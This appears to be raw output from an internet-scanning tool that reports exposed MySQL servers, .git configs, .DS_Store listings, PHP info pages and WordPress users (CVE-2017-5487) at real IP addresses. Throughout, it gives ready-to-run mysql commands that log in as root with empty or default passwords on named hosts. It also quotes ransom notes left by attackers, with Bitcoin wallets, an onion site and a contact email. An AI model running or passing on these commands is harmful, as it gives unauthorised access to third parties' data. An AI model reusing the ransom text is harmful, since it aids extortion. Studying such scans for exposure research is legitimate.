+plugin:MysqlSchemaPlugin
No or default MySQL authentication found.
Analysis helper :
mysql -h216.37.94.133 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 1, row count: 1, size: 16.4 kB
Found table PLEASE_READ_ME_XMG.WARNING with 1 records
Ransom notes :
1 To recover your lost databases and avoid leaking it: visit http://o42xfh5kao7mrtesnok5jgdsfagjsgzxlxdlpkpd2x6lpckhzk225yad.onion and enter your unique token 2f0566cf775e48f9 and pay the required amount of Bitcoin to get it back. Databases that we have: . Your databases are downloaded and backed up on our servers. If we dont receive your payment in the next 9 Days, we will sell your database to the highest bidder or use them otherwise. To access this site you have use the tor browser https://www.torproject.org/projects/torbrowser.html http://o42xfh5kao7mrtesnok5jgdsfagjsgzxlxdlpkpd2x6lpckhzk225yad.onion 2f0566cf775e48f9
Analysis helper :
mysql -h107.179.4.250 -uroot -proot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 49, row count: 143265, size: 8.3 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv wi...
Ransom notes :
All your data is a backed up. You must pay 0.1 BTC to 1Lnn7TEcDn4GHBSMNki62Fi3Jjs7dggoX8 48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!
Analysis helper :
mysql -h172.105.33.198 -uroot -proot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
No or default MySQL authentication found.
Analysis helper :
mysql -h49.212.152.84 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
No or default MySQL authentication found.
Analysis helper :
mysql -h80.86.94.181 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
{"msg":"module not exists:config.json"}
Databases: 52, row count: 143075, size: 7.9 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table actwin.chauffeur with...
Ransom notes :
All your data is a backed up. You must pay 0.16 BTC to 1322TfVUsgwNkWupVwEdceyRYbEZeN9qCu 48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!
Analysis helper :
mysql -h62.171.157.49 -uroot -padmin -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/bugzilla/...
Found 9 files through .DS_Store spidering:
/android
/linux
/linux/PigchaClient
/mac
/mac/PigchaClient.dmg
/misc
/misc/co2fun
/windows
/windows/Pi...
Databases: 71, row count: 143416, size: 8.7 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table default.app_data with...
Ransom notes :
All your data is a backed up. You must pay 0.1 BTC to 1Di1cM1QgTxZuwsxp9nRBc6UXUAhbMN7YX 48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!
Analysis helper :
mysql -h3.86.28.255 -uroot -proot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 610, row count: 2835, size: 16.4 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 0 records
Found table mysql.abdevj32 with 1...
Analysis helper :
mysql -h107.179.34.202 -uroot -proot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 38, row count: 126659, size: 7.2 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table mysql.audit_log_rules...
Ransom notes :
All your data is a backed up. You must pay 0.16 BTC to 1322TfVUsgwNkWupVwEdceyRYbEZeN9qCu 48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!
Analysis helper :
mysql -h34.141.52.178 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Found 6 files through .DS_Store spidering:
/assets
/assets/css
/assets/img
/assets/js
/assets/libs
/login.html
Databases: 1, row count: 0, size: 0 B
Found table . with 0 records
Analysis helper :
mysql -h45.33.12.251 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 81, row count: 1188, size: 2.8 MB
Found table mysql.db with 8 records
Found table mysql.global_priv with 6 records
Found table mysql.u...
Ransom notes :
All your data is a backed up. You must pay 0.1 BTC to 17BRyuxS53TQshpcJYKCpPjHDFAFcCFAnJ 48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!
Analysis helper :
mysql -h94.131.152.205 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 151, row count: 2423, size: 3.0 MB
Found table PLEASE_READ_ME_RTG.README with 1 records
Found table Z_README_TO_RECOVER.README with 1 ...
Ransom notes :
1 To recover your lost Database send 0.004 Bitcoin (BTC) to our Bitcoin address: bc1qvt6d7gjzdvf3ns8nlq56g6pzjmg74exwyu6tf8 After this, contact us by email with your Server IP or Domain Name and a Proof of Payment (Payment ID). Your Database is downloaded and backed up on our servers. Backups that we have right now: Z_README_TO_RECOVER. Any email without your server IP Address or Domain Name and a Proof of Payment together will be ignored. If we dont receive your payment in the next 10 Days, we will delete or leak your sensitive information. bc1qvt6d7gjzdvf3ns8nlq56g6pzjmg74exwyu6tf8 datarecover@protonmail.com
Analysis helper :
mysql -h104.223.209.52 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Found PHP info page:
_SERVER["HTTP_HOST"] = 46.97.15.10
_SERVER["HTTP_USER_AGENT"] = l9explore/1.3.0
_SERVER["HTTP_ACCEPT_ENCODING"] = gzip
_SERV...
No or default MySQL authentication found.
Analysis helper :
mysql -h59.12.193.73 -uroot -proot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 1, row count: 0, size: 0 B
Found table . with 0 records
Analysis helper :
mysql -h47.91.124.248 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Found Wordpress users (CVE-2017-5487):
User #1 admin
Name: admin
Url:
User #3 karina
Name: karina
Url: